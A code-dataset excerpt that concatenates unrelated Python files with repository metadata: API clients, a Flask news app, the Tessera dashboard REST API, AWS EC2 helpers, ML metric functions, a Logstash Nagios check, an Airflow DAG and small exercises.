paste_expire_date = str(paste_expire_date).strip().upper()
argv['paste_expire_date'] = paste_expire_date
# Syntax highlighting
if paste_format is not None:
paste_format = str(paste_format).strip().lower()
argv['paste_format'] = paste_format
# lets try to read the URL that we've just built.
request_string = urllib.urlopen(self._legacy_api_url, urllib.urlencode(argv))
response = request_string.read()
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
elif not response.startswith(self._prefix_url):
raise PastebinError(response)
return response
######################################################
delete_paste = PastebinAPI.delete_paste
user_details = PastebinAPI.user_details
trending = PastebinAPI.trending
pastes_by_user = PastebinAPI.pastes_by_user
generate_user_key = PastebinAPI.generate_user_key
legacy_paste = PastebinAPI.legacy_paste
paste = PastebinAPI.paste
######################################################
if __name__ == "__main__":
main()
| 1.726563 | 2 |
app/requests.py | seron-ux/News-app | 1 | 6840 | <gh_stars>1-10
import urllib.request,json
from .models import News
import requests
News = News
# Getting api key
api_key = None
# Getting the news base url
base_url = None
base_url2 = None
def configure_request(app):
global api_key,base_url,base_url2
api_key = app.config['NEWS_API_KEY']
base_url = app.config['NEWS_API_BASE_URL']
base_url2 = app.config['ARTICLE_API_BASE_URL']
def get_news(category):
'''
Function that gets the json responce to our url request
'''
get_news_url = base_url.format(category,api_key)
print(get_news_url)
get_news_response = requests.get(get_news_url).json()
print(get_news_response)
news_results = None
if get_news_response['articles']:
news_results_list = get_news_response['articles']
news_results = process_results(news_results_list)
return news_results
def search_news(news_name):
search_news_url = 'https://api.thenewsdb.org/3/search/news?api_key={}&query={}'.format(api_key,news_name)
search_news_response = requests.get(search_news_url).json()
search_news_results = None
if search_news_response['results']:
search_news_list = search_news_response['results']
search_news_results = process_results(search_news_list)
return search_news_results
def process_results(news_list):
'''
Function that processes the news result and transform them to a list of Objects
Args:
news_list: A list of dictionaries that contain news details
Returns :
news_results: A list of news objects
'''
news_results = []
for news_item in news_list:
title = news_item.get('title')
image = news_item.get('urlToImage')
description = news_item.get('description')
date = news_item.get('publishedAt')
article = news_item.get('url')
if image:
news_object = News(title,image,description,date,article)
news_results.append(news_object)
return news_results
def get_article(source):
'''
Function that gets the json responce to our url request
'''
get_news_url = base_url.format(source,api_key)
with urllib.request.urlopen(get_news_url) as url:
get_news_data = url.read()
get_news_response = json.loads(get_news_data)
news_results = None
if get_news_response['articles']:
news_results_list = get_news_response['articles']
news_results = process_results(news_results_list)
return news_results
| 2.9375 | 3 |
leetcode/151_reverse _words_in_a_string.py | caoxudong/code_practice | 1 | 6841 | """
Given an input string, reverse the string word by word.
For example,
Given s = "the sky is blue",
return "blue is sky the".
For C programmers: Try to solve it in-place in O(1) space.
Clarification:
* What constitutes a word?
A sequence of non-space characters constitutes a word.
* Could the input string contain leading or trailing spaces?
Yes. However, your reversed string should not contain leading or trailing spaces.
* How about multiple spaces between two words?
Reduce them to a single space in the reversed string.
https://leetcode.com/problems/reverse-words-in-a-string/
"""
class Solution:
# @param s, a string
# @return a string
def reverseWords(self, s):
elements = s.split(" ")
elements = [x for x in elements if x != ""]
elements = elements[::-1]
return " ".join(elements) | 4.03125 | 4 |
toontown/uberdog/DistributedInGameNewsMgr.py | LittleNed/toontown-stride | 3 | 6842 | import socket, datetime, os
from direct.distributed.DistributedObjectGlobal import DistributedObjectGlobal
from direct.distributed.DistributedObject import DistributedObject
from toontown.toonbase import ToontownGlobals
from toontown.uberdog import InGameNewsResponses
class DistributedInGameNewsMgr(DistributedObject):
notify = directNotify.newCategory('InGameNewsMgr')
neverDisable = 1
def __init__(self, cr):
DistributedObject.__init__(self, cr)
base.cr.inGameNewsMgr = self
def delete(self):
DistributedObject.delete(self)
self.cr.inGameNewsMgr = None
return
def disable(self):
self.notify.debug("i'm disabling InGameNewsMgr rightnow.")
DistributedObject.disable(self)
def generate(self):
self.notify.debug('BASE: generate')
DistributedObject.generate(self)
def setLatestIssueStr(self, issueStr):
self.latestIssueStr = issueStr
self.latestIssue = base.cr.toontownTimeManager.convertUtcStrToToontownTime(issueStr)
messenger.send('newIssueOut')
self.notify.info('latestIssue=%s' % self.latestIssue)
def getLatestIssueStr(self):
pass
def getLatestIssue(self):
return self.latestIssue
| 2.140625 | 2 |
Day10/loops.py | azeemchaudhrry/30DaysofPython | 0 | 6843 | <filename>Day10/loops.py
# Day 10 Loops
from countries import *
# While Loop
# count = 0
# while count < 5:
# if count == 3:
# break
# print(count)
# count = count + 1
# numbers = [0,2,3,4,5,6,7,8,9,10]
# for number in numbers:
# print(number)
# language = 'Python'
# for letter in language:
# print(letter)
# tpl = ('python','updates','wow')
# for number in tpl:
# print(number)
# person = {
# 'first_name':'Asabeneh',
# 'last_name':'Yetayeh',
# 'age':250,
# 'country':'Finland',
# 'is_marred':True,
# 'skills':['JavaScript', 'React', 'Node', 'MongoDB', 'Python'],
# 'address':{
# 'street':'Space street',
# 'zipcode':'02210'
# }
# }
# print('------------------------------------')
# for key in person:
# print(key)
# print('------------------------------------')
# for key,value in person.items():
# print(key, value)
# print('--------------------------------------')
# it_companies = {'Facebook', 'Google', 'Microsoft', 'Apple', 'IBM', 'Oracle', 'Amazon'}
# for company in it_companies:
# print(company)
# print('--------------------------------------')
# numbers = (0,1,2,3,4,5,6,7)
# for number in numbers:
# print(number)
# if(number == 3):
# break
# print('--------------------------------------')
# for number in numbers:
# print(number)
# if(number == 3):
# continue
# print('--------------------------------------')
# numbers = (0,1,2,3,4,5)
# for number in numbers:
# print(number)
# if number == 3:
# continue
# print('Next number should be ', number + 1) if number != 5 else print("loop's end") # for short hand conditions need both if and else statements
# print('outside the loop')
# print('--------------------------------------')
# lst = list(range(11))
# print(lst)
# st = set(range(1,11))
# print(st)
# lst = list(range(0,11,2))
# print(lst)
# st = set(range(0,11,2))
# print(st)
# Exercises: Day 10
# Iterate 0 to 10 using for loop, do the same using while loop.
# numbers = [0,1,2,3,4,5,6,7,8,9,10]
# for number in numbers:
# print(number)
# count = 0
# while count < 10:
# print(count)
# count += 1
# Iterate 10 to 0 using for loop, do the same using while loop.
# for number in range(10,-1,-1):
# print(number)
# count = 10
# while count > -1:
# print(count)
# count -= 1
# Write a loop that makes seven calls to print(), so we get on the output the following triangle:
for index in range(0,8):
print(index * '#')
limit = 9
for i in range(0,limit):
for j in range(0,limit):
print('# ', end='')
print('')
for i in range(0, 11):
print(f'{i} x {i} = {i * i}')
frameworks = ['Python', 'Numpy','Pandas','Django', 'Flask']
for framework in frameworks:
print(framework)
for i in range(0,101):
if i % 2 == 0:
print(i)
for i in range(0,101):
if i % 2 != 0:
print(i)
sum = 0
for i in range(0,101):
sum += i
print('The sum of all numbers is : ', sum)
even_sum = odd_sum = 0
for i in range(0,101):
if i % 2 == 0:
even_sum += i
elif i % 2 != 0:
odd_sum += i
print(f'The sum of all evens is {even_sum}. And the sum of all odds is {odd_sum}.')
for country in countries:
if 'land' in country:
print(country)
fruits = ['banana', 'orange', 'mango', 'lemon']
total_elements = len(fruits) - 1
for i in range(0, int(len(fruits) / 2)):
temp_element = fruits[i]
fruits[i] = fruits[total_elements - i]
fruits[total_elements - i] = temp_element
print(fruits) | 3.828125 | 4 |
tessera-server/tessera/views_api.py | Dimas625/tessera | 379 | 6844 | <reponame>Dimas625/tessera<filename>tessera-server/tessera/views_api.py
# -*- mode:python -*-
import flask
import json
import logging
from datetime import datetime
import inflection
from functools import wraps
from flask import request, url_for
from werkzeug.exceptions import HTTPException
from .client.api.model import *
from . import database
from . import helpers
from .application import db
mgr = database.DatabaseManager(db)
log = logging.getLogger(__name__)
api = flask.Blueprint('api', __name__)
# =============================================================================
# API Helpers
# =============================================================================
def route_api(application, *args, **kwargs):
def decorator(fn):
@application.route(*args, **kwargs)
@wraps(fn)
def wrapper(*args, **kwargs):
headers = None
status_code = 200
try:
value = fn(*args, **kwargs)
except HTTPException as e:
raise helpers.set_exception_response(e)
if isinstance(value, tuple):
if len(value) > 2:
headers = value[2]
status_code = value[1]
value = value[0]
return helpers.jsonify(value, status_code, headers)
return fn
return decorator
def _dashboard_sort_column():
"""Return a SQLAlchemy column descriptor to sort results by, based on
the 'sort' and 'order' request parameters.
"""
columns = {
'created' : database.DashboardRecord.creation_date,
'modified' : database.DashboardRecord.last_modified_date,
'category' : database.DashboardRecord.category,
'id' : database.DashboardRecord.id,
'title' : database.DashboardRecord.title
}
colname = helpers.get_param('sort', 'created')
order = helpers.get_param('order')
column = database.DashboardRecord.creation_date
if colname in columns:
column = columns[colname]
if order == 'desc' or order == u'desc':
return column.desc()
else:
return column.asc()
def _set_dashboard_hrefs(dash):
"""Add the various ReSTful hrefs to an outgoing dashboard
representation. dash should be the dictionary for of the dashboard,
not the model object.
"""
id = dash['id']
dash['href'] = url_for('api.dashboard_get', id=id)
dash['definition_href'] = url_for('api.dashboard_get_definition', id=id)
dash['view_href'] = url_for('ui.dashboard_with_slug',
id=id,
slug=inflection.parameterize(dash['title']))
if 'definition' in dash:
definition = dash['definition']
definition['href'] = url_for('api.dashboard_get_definition', id=id)
return dash
def _dashboards_response(dashboards):
"""Return a Flask response object for a list of dashboards in API
format. dashboards must be a list of dashboard model objects, which
will be converted to their JSON representation.
"""
if not isinstance(dashboards, list):
dashboards = [dashboards]
include_definition = helpers.get_param_boolean('definition', False)
return [ _set_dashboard_hrefs(d.to_json(include_definition=include_definition)) for d in dashboards]
def _set_tag_hrefs(tag):
"""Add ReSTful href attributes to a tag's dictionary
representation.
"""
id = tag['id']
tag['href'] = url_for('api.tag_get', id=id)
return tag
def _tags_response(tags):
"""Return a Flask response object for a list of tags in API
format. tags must be a list of tag model objects, which
will be converted to their JSON representation.
"""
if not isinstance(tags, list):
tags = [tags]
return [_set_tag_hrefs(t.to_json()) for t in tags]
# =============================================================================
# Dashboards
# =============================================================================
@route_api(api, '/dashboard/')
def dashboard_list():
"""Listing for all dashboards. Returns just the metadata, not the
definitions.
"""
imported_from = request.args.get('imported_from')
if imported_from:
query = database.DashboardRecord.query.filter_by(imported_from=imported_from) \
.order_by(_dashboard_sort_column())
else:
query = database.DashboardRecord.query.order_by(_dashboard_sort_column())
dashboards = [d for d in query.all()]
return _dashboards_response(dashboards)
@route_api(api, '/dashboard/tagged/<tag>')
def dashboard_list_tagged(tag):
"""Listing for a set of dashboards with a tag applied. Returns just
the metadata, not the definitions.
"""
tag = database.TagRecord.query.filter_by(name=tag).first()
if not tag:
return _dashboards_response([])
dashboards = [d for d in tag.dashboards.order_by(_dashboard_sort_column()) if tag]
return _dashboards_response(dashboards)
@route_api(api, '/dashboard/category/<category>')
def dashboard_list_dashboards_in_category(category):
"""Listing for a set of dashboards in a specified category. Returns
just the metadata, not the definitions.
"""
dashboards = [d for d in database.DashboardRecord.query
.filter_by(category=category)
.order_by(_dashboard_sort_column()) ]
return _dashboards_response(dashboards)
@route_api(api, '/dashboard/category/')
def dashboard_list_all_dashboard_categories():
result = db.session.query(
database.DashboardRecord.category,
db.func.count(database.DashboardRecord.category)
).group_by(database.DashboardRecord.category).all()
categories = []
for (name, count) in result:
categories.append({
'name' : name,
'count' : count,
})
return categories
@route_api(api, '/dashboard/<id>')
def dashboard_get(id):
"""Get the metadata for a single dashboard.
"""
dashboard = database.DashboardRecord.query.get_or_404(id)
rendering = helpers.get_param('rendering', False)
include_definition = helpers.get_param_boolean('definition', False)
dash = _set_dashboard_hrefs(dashboard.to_json(rendering or include_definition))
if rendering:
dash['preferences'] = helpers.get_preferences()
return dash
@route_api(api, '/dashboard/<id>/for-rendering')
def dashboard_get_for_rendering(id):
"""Get a dashboard with its definition, and current settings necessary
for rendering.
"""
dashboard = database.DashboardRecord.query.get_or_404(id)
dash = _set_dashboard_hrefs(dashboard.to_json(True))
return {
'dashboard' : dash,
'preferences' : helpers.get_preferences()
}
@route_api(api, '/dashboard/', methods=['POST'])
def dashboard_create():
"""Create a new dashboard with an empty definition.
"""
dashboard = database.DashboardRecord.from_json(request.json)
if not dashboard.title:
return {
'error_message': "Missing required field 'title'"
}, 400
if 'definition' in request.json:
dashboard.definition = database.DefinitionRecord(dumps(request.json['definition']))
else:
dashboard.definition = database.DefinitionRecord(dumps(DashboardDefinition()))
mgr.store_dashboard(dashboard)
href = url_for('api.dashboard_get', id=dashboard.id)
return {
'dashboard_href' : href,
'view_href' : url_for('ui.dashboard_with_slug',
id=dashboard.id,
slug=inflection.parameterize(dashboard.title))
}, 201, { 'Location' : href }
@route_api(api, '/dashboard/<id>', methods=['PUT'])
def dashboard_update(id):
"""Update the metadata for an existing dashboard.
"""
body = request.json
dashboard = database.DashboardRecord.query.get_or_404(id)
dashboard.merge_from_json(body)
mgr.store_dashboard(dashboard)
# TODO - return similar to create, above
return {}
@route_api(api, '/dashboard/<id>', methods=['DELETE'])
def dashboard_delete(id):
"""Delete a dashboard. Use with caution.
"""
dashboard = database.DashboardRecord.query.get_or_404(id)
db.session.delete(dashboard)
db.session.commit()
return {}, 204
@route_api(api, '/dashboard/<id>/definition')
def dashboard_get_definition(id):
"""Fetch the definition for a dashboard. This returns the
representation to use when modifiying a dashboard.
"""
dashboard = database.DashboardRecord.query.filter_by(id=id)[0]
definition = database.DashboardRecord.query.get_or_404(id).definition.to_json()
definition['href'] = url_for('api.dashboard_get_definition', id=id)
definition['dashboard_href'] = url_for('api.dashboard_get', id=id)
return definition
@route_api(api, '/dashboard/<id>/definition', methods=['PUT'])
def dashboard_update_definition(id):
"""Update the definition of the dashboard. This should use the
representation returned by /api/dashboard/<id>/definition, and
should NOT have any embedded variables expanded, nor should it
have complete graphite URLs in the queries.
"""
dashboard = database.DashboardRecord.query.get_or_404(id)
# Validate the payload
definition = DashboardDefinition.from_json(json.loads(request.data.decode('utf-8')))
if dashboard.definition:
dashboard.definition.definition = dumps(definition)
else:
dashboard.definition = database.DashboardRecordDef(request.data)
mgr.store_dashboard(dashboard)
return {}
# =============================================================================
# Tags
# =============================================================================
@route_api(api, '/tag/')
def tag_list():
"""Listing for all tags.
"""
tags = db.session.query(database.TagRecord).all()
return _tags_response(tags)
@route_api(api, '/tag/<id>')
def tag_get(id):
tag = database.TagRecord.query.get_or_404(id)
return _tags_response(tag)
# =============================================================================
# Miscellany
# =============================================================================
@route_api(api, '/preferences/')
def preferences_get():
return helpers.get_preferences()
@route_api(api, '/preferences/', methods=['PUT'])
def preferences_put():
helpers.set_preferences(request.json)
return helpers.get_preferences()
| 2.1875 | 2 |
modules/aws_service.py | Darkcybe/attack_range | 1 | 6845 | <gh_stars>1-10
import sys
import re
import boto3
from botocore.exceptions import ClientError
import uuid
import time
import yaml
import os
def get_instance_by_name(ec2_name, config):
instances = get_all_instances(config)
for instance in instances:
str = instance['Tags'][0]['Value']
if str == ec2_name:
return instance
def get_single_instance_public_ip(ec2_name, config):
instance = get_instance_by_name(ec2_name, config)
return instance['NetworkInterfaces'][0]['Association']['PublicIp']
def get_all_instances(config):
key_name = config['key_name']
region = config['region']
client = boto3.client('ec2', region_name=region)
response = client.describe_instances(
Filters=[
{
'Name': "key-name",
'Values': [key_name]
}
]
)
instances = []
for reservation in response['Reservations']:
for instance in reservation['Instances']:
if instance['State']['Name']!='terminated':
if len(instance['Tags']) > 0:
str = instance['Tags'][0]['Value']
if str.startswith(config['range_name'] + '-attack-range'):
instances.append(instance)
return instances
def get_splunk_instance_ip(config):
all_instances = get_all_instances(config)
for instance in all_instances:
instance_tag = config['range_name'] + '-attack-range-splunk-server'
if instance['Tags'][0]['Value'] == instance_tag:
return instance['NetworkInterfaces'][0]['PrivateIpAddresses'][0]['Association']['PublicIp']
def check_ec2_instance_state(ec2_name, state, config):
instance = get_instance_by_name(ec2_name, config)
if not instance:
log.error(ec2_name + ' not found as AWS EC2 instance.')
sys.exit(1)
return (instance['State']['Name'] == state)
def change_ec2_state(instances, new_state, log, config):
region = config['region']
client = boto3.client('ec2', region_name=region)
if len(instances) == 0:
log.error(ec2_name + ' not found as AWS EC2 instance.')
sys.exit(1)
if new_state == 'stopped':
for instance in instances:
if instance['State']['Name'] == 'running':
response = client.stop_instances(
InstanceIds=[instance['InstanceId']]
)
log.info('Successfully stopped instance with ID ' +
instance['InstanceId'] + ' .')
elif new_state == 'running':
for instance in instances:
if instance['State']['Name'] == 'stopped':
response = client.start_instances(
InstanceIds=[instance['InstanceId']]
)
log.info('Successfully started instance with ID ' + instance['InstanceId'] + ' .')
# def upload_file_s3_bucket(file_name, results, test_file, isArchive):
# region = config['region']
# s3_client = boto3.client('s3', region_name=region)
# if isArchive:
# response = s3_client.upload_file(file_name, 'attack-range-attack-data', str(test_file['simulation_technique'] + '/attack_data.tar.gz'))
# else:
# response = s3_client.upload_file(file_name, 'attack-range-attack-data', str(test_file['simulation_technique'] + '/attack_data.json'))
#
# with open('tmp/test_results.yml', 'w') as f:
# yaml.dump(results, f)
# response2 = s3_client.upload_file('tmp/test_results.yml', 'attack-range-automated-testing', str(test_file['simulation_technique'] + '/test_results.yml'))
# os.remove('tmp/test_results.yml')
def upload_file_s3_bucket(s3_bucket, file_path, S3_file_path, config):
region = config['region']
s3_client = boto3.client('s3', region_name=region)
response = s3_client.upload_file(file_path, s3_bucket, S3_file_path)
def upload_test_results_s3_bucket(s3_bucket, test_file, test_result_file_path, config):
region = config['region']
s3_client = boto3.client('s3', region_name=region)
response = s3_client.upload_file(test_result_file_path, s3_bucket, str(test_file['simulation_technique'] + '/test_results.yml'))
| 2.3125 | 2 |
pystacknet/metrics.py | KevinMichaelSchindler/pystacknet | 0 | 6846 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 31 18:33:58 2018
@author: <NAME>
metrics and method to check metrics used within StackNet
"""
from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score , mean_squared_log_error #regression metrics
from sklearn.metrics import roc_auc_score, log_loss ,accuracy_score, f1_score ,matthews_corrcoef
import numpy as np
valid_regression_metrics=["rmse","mae","rmsle","r2","mape","smape"]
valid_classification_metrics=["auc","logloss","accuracy","f1","matthews"]
############ classification metrics ############
def auc(y_true, y_pred, sample_weight=None):
return roc_auc_score(y_true, y_pred, sample_weight=sample_weight)
def logloss(y_true, y_pred, sample_weight=None, labels = None):
return log_loss(y_true, y_pred, sample_weight=sample_weight, labels = labels)
def accuracy(y_true, y_pred, sample_weight=None):
return accuracy_score(y_true, y_pred, sample_weight=sample_weight)
def f1(y_true, y_pred, sample_weight=None):
return f1_score(y_true, y_pred, sample_weight=sample_weight)
def matthews(y_true, y_pred, sample_weight=None):
return matthews_corrcoef(y_true, y_pred, sample_weight=sample_weight)
############ regression metrics ############
def rmse(y_true, y_pred, sample_weight=None):
return np.sqrt(mean_squared_error(y_true, y_pred, sample_weight=sample_weight))
def mae(y_true, y_pred, sample_weight=None):
return mean_absolute_error(y_true, y_pred, sample_weight=sample_weight)
def rmsle (y_true, y_pred, sample_weight=None):
return np.sqrt(mean_squared_log_error(y_true, y_pred, sample_weight=sample_weight))
def r2(y_true, y_pred, sample_weight=None):
return r2_score(y_true, y_pred, sample_weight=sample_weight)
def mape(y_true, y_pred, sample_weight=None):
y_true = y_true.ravel()
y_pred = y_pred.ravel()
if sample_weight is not None:
sample_weight = sample_weight.ravel()
eps = 1E-15
ape = np.abs((y_true - y_pred) / (y_true + eps)) * 100
ape[y_true == 0] = 0
return np.average(ape, weights=sample_weight)
def smape(y_true, y_pred, sample_weight=None):
y_true = y_true.ravel()
y_pred = y_pred.ravel()
if sample_weight is not None:
sample_weight = sample_weight.ravel()
eps = 1E-15
sape = (np.abs(y_true - y_pred) / (0.5 * (np.abs(y_true) + np.abs(y_pred)) + eps)) * 100
sape[(y_true == 0) & (y_pred == 0)] = 0
return np.average(sape, weights=sample_weight)
"""
metric: string or class that returns a metric given (y_true, y_pred, sample_weight=None)
Curently supported metrics are "rmse","mae","rmsle","r2","mape","smape"
"""
def check_regression_metric(metric):
if type(metric) is type(None):
raise Exception ("metric cannot be None")
if isinstance(metric, str) :
if metric not in valid_regression_metrics:
raise Exception ("The regression metric has to be one of %s " % (", ".join([str(k) for k in valid_regression_metrics])))
if metric=="rmse":
return rmse,metric
elif metric=="mae":
return mae,metric
elif metric=="rmsle":
return rmsle,metric
elif metric=="r2":
return r2,metric
elif metric=="mape":
return mape,metric
elif metric=="smape":
return smape,metric
else :
raise Exception ("The metric %s is not recognised " % (metric) )
else : #customer metrics is given
try:
y_true_temp=[[1],[2],[3]]
y_pred_temp=[[2],[1],[3]]
y_true_temp=np.array(y_true_temp)
y_pred_temp=np.array(y_pred_temp)
sample_weight_temp=[1,0.5,1]
metric(y_true_temp,y_pred_temp, sample_weight=sample_weight_temp )
return metric,"custom"
except:
raise Exception ("The custom metric has to implement metric(y_true, y_pred, sample_weight=None)" )
"""
metric: string or class that returns a metric given (y_true, y_pred, sample_weight=None)
Curently supported metrics are "rmse","mae","rmsle","r2","mape","smape"
"""
def check_classification_metric(metric):
if type(metric) is type(None):
raise Exception ("metric cannot be None")
if isinstance(metric, str) :
if metric not in valid_classification_metrics:
raise Exception ("The classification metric has to be one of %s " % (", ".join([str(k) for k in valid_classification_metrics])))
if metric=="auc":
return auc,metric
elif metric=="logloss":
return logloss,metric
elif metric=="accuracy":
return accuracy,metric
elif metric=="r2":
return r2,metric
elif metric=="f1":
return f1,metric
elif metric=="matthews":
return matthews,metric
else :
raise Exception ("The metric %s is not recognised " % (metric) )
else : #customer metrics is given
try:
y_true_temp=[[1],[0],[1]]
y_pred_temp=[[0.4],[1],[0.2]]
y_true_temp=np.array(y_true_temp)
y_pred_temp=np.array(y_pred_temp)
sample_weight_temp=[1,0.5,1]
metric(y_true_temp,y_pred_temp, sample_weight=sample_weight_temp )
return metric,"custom"
except:
raise Exception ("The custom metric has to implement metric(y_true, y_pred, sample_weight=None)" )
| 2.40625 | 2 |
check_logstash_pipeline.py | stdevel/nagios-plugins | 0 | 6847 | #!/usr/bin/env python
# coding=utf-8
# vim:ts=4:sts=4:sw=4:et
#
# Author: <NAME>
# Date: 2017-11-24 21:10:35 +0100 (Fri, 24 Nov 2017)
#
# https://github.com/harisekhon/nagios-plugins
#
# License: see accompanying Hari Sekhon LICENSE file
#
# If you're using my code you're welcome to connect with me on LinkedIn
# and optionally send me feedback to help steer this or other code I publish
#
# https://www.linkedin.com/in/harisekhon
#
"""
Nagios Plugin to check a Logstash pipeline is online via the Logstash Rest API
API is only available in Logstash 5.x onwards, will get connection refused on older versions
Optional thresholds apply to the number of pipeline workers
Ensure Logstash options:
--http.host should be set to 0.0.0.0 if querying remotely
--http.port should be set to the same port that you are querying via this plugin's --port switch
Tested on Logstash 5.0, 5.1, 5.2, 5.3, 5.4, 5.5, 5.6, 6.0, 6.1
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import traceback
srcdir = os.path.abspath(os.path.dirname(__file__))
libdir = os.path.join(srcdir, 'pylib')
sys.path.append(libdir)
try:
# pylint: disable=wrong-import-position
#from harisekhon.utils import log
from harisekhon.utils import ERRORS, UnknownError, support_msg_api
from harisekhon.utils import validate_chars
from harisekhon import RestNagiosPlugin
except ImportError as _:
print(traceback.format_exc(), end='')
sys.exit(4)
__author__ = '<NAME>'
__version__ = '0.6'
class CheckLogstashPipeline(RestNagiosPlugin):
def __init__(self):
# Python 2.x
super(CheckLogstashPipeline, self).__init__()
# Python 3.x
# super().__init__()
self.name = 'Logstash'
self.default_port = 9600
# could add pipeline name to end of this endpoint but error would be less good 404 Not Found
# Logstash 5.x /_node/pipeline <= use -5 switch for older Logstash
# Logstash 6.x /_node/pipelines
self.path = '/_node/pipelines'
self.auth = False
self.json = True
self.msg = 'Logstash piplines msg not defined yet'
self.pipeline = None
def add_options(self):
super(CheckLogstashPipeline, self).add_options()
self.add_opt('-i', '--pipeline', default='main', help='Pipeline to expect is configured (default: main)')
self.add_opt('-d', '--dead-letter-queue-enabled', action='store_true',
help='Check dead letter queue is enabled on pipeline (optional, only applies to Logstash 6+)')
self.add_opt('-5', '--logstash-5', action='store_true',
help='Logstash 5.x (has a slightly different API endpoint to 6.x)')
self.add_opt('-l', '--list', action='store_true', help='List pipelines and exit (only for Logstash 6+)')
self.add_thresholds()
def process_options(self):
super(CheckLogstashPipeline, self).process_options()
self.pipeline = self.get_opt('pipeline')
validate_chars(self.pipeline, 'pipeline', 'A-Za-z0-9_-')
# slightly more efficient to not return the potential list of other pipelines but the error is less informative
#self.path += '/{}'.format(self.pipeline)
if self.get_opt('logstash_5'):
if self.pipeline != 'main':
self.usage("--pipeline can only be 'main' for --logstash-5")
if self.get_opt('list'):
self.usage('can only --list pipelines for Logstash 6+')
if self.get_opt('dead_letter_queue_enabled'):
self.usage('--dead-letter-queue-enabled only available with Logstash 6+')
self.path = self.path.rstrip('s')
self.validate_thresholds(simple='lower', optional=True)
def parse_json(self, json_data):
if self.get_opt('logstash_5'):
pipeline = json_data['pipeline']
else:
pipelines = json_data['pipelines']
if self.get_opt('list'):
print('Logstash Pipelines:\n')
for pipeline in pipelines:
print(pipeline)
sys.exit(ERRORS['UNKNOWN'])
pipeline = None
if self.pipeline in pipelines:
pipeline = pipelines[self.pipeline]
self.msg = "Logstash pipeline '{}' ".format(self.pipeline)
if pipeline:
self.msg += 'exists'
if 'workers' not in pipeline:
raise UnknownError('workers field not found, Logstash may still be initializing' + \
'. If problem persists {}'.format(support_msg_api()))
workers = pipeline['workers']
self.msg += ' with {} workers'.format(workers)
self.check_thresholds(workers)
if not self.get_opt('logstash_5'):
dead_letter_queue_enabled = pipeline['dead_letter_queue_enabled']
self.msg += ', dead letter queue enabled: {}'.format(dead_letter_queue_enabled)
if self.get_opt('dead_letter_queue_enabled') and not dead_letter_queue_enabled:
self.warning()
self.msg += ' (expected True)'
batch_delay = pipeline['batch_delay']
batch_size = pipeline['batch_size']
self.msg += ', batch delay: {}, batch size: {}'.format(batch_delay, batch_size)
else:
self.critical()
self.msg += 'does not exist!'
if __name__ == '__main__':
CheckLogstashPipeline().main()
| 1.429688 | 1 |
dags/mailsdag.py | rvacaru/airflow-training-skeleton | 0 | 6848 | <filename>dags/mailsdag.py
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Example DAG demonstrating the usage of the BashOperator."""
from datetime import timedelta
import datetime
import airflow
from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python_operator import BranchPythonOperator
args = {
'owner': 'Airflow',
'start_date': airflow.utils.dates.days_ago(14),
}
dag = DAG(
dag_id='exercise_weekday',
default_args=args,
schedule_interval='0 0 * * *',
dagrun_timeout=timedelta(minutes=60),
)
dummy_last = DummyOperator(
task_id='run_this_last',
dag=dag,
trigger_rule='one_success',
)
def print_weekday(**context):
day = context["execution_date"].strftime('%a')
print(day)
return day
weekday_task = PythonOperator(
task_id='weekday_task',
python_callable=print_weekday,
provide_context=True,
dag=dag,
)
# optimize with try exept
weekday_person = {
"Mon": "bob",
"Tue": "joe",
"Thu": "joe",
}
def define_oncall(**context):
day = print_weekday(**context)
try:
task_id = weekday_person[day]
except KeyError:
return "ali"
return task_id
branch_task = BranchPythonOperator(
task_id='branch_task',
python_callable=define_oncall,
provide_context=True,
dag=dag,
)
tasks = ["bob", "joe", "ali"]
for p in tasks:
taski = DummyOperator(
task_id=p,
dag=dag,
)
branch_task >> taski
taski >> dummy_last
weekday_task >> branch_task
| 2.28125 | 2 |
appengine-compat/exported_appengine_sdk/google/storage/speckle/proto/jdbc_type.py | speedplane/python-compat-runtime | 26 | 6849 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Python equivalent of jdbc_type.h.
Python definition of the JDBC type constant values defined in Java class
java.sql.Types. Since the values don't fall into the range allowed by
a protocol buffer enum, we use Python constants instead.
If you update this, update jdbc_type.py also.
"""
BIT = -7
TINYINT = -6
SMALLINT = 5
INTEGER = 4
BIGINT = -5
FLOAT = 6
REAL = 7
DOUBLE = 8
NUMERIC = 2
DECIMAL = 3
CHAR = 1
VARCHAR = 12
LONGVARCHAR = -1
DATE = 91
TIME = 92
TIMESTAMP = 93
BINARY = -2
VARBINARY = -3
LONGVARBINARY = -4
NULL = 0
OTHER = 1111
JAVA_OBJECT = 2000
DISTINCT = 2001
STRUCT = 2002
ARRAY = 2003
BLOB = 2004
CLOB = 2005
REF = 2006
DATALINK = 70
BOOLEAN = 16
ROWID = -8
NCHAR = -15
NVARCHAR = -9
LONGNVARCHAR = -16
NCLOB = 2011
SQLXML = 2009
| 1.929688 | 2 |
GestiRED/views.py | osabogal10/GestiREDBackend | 0 | 6850 | from django.http import HttpResponse
from django.core.mail import send_mail
import json
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from GestiRED.models import User
from GestiRED.models import QualityControl, Phase, Resource, ResourceType,PhaseType
from django.core import serializers
from django.db.models import Q
# Create your views here.
def index(request):
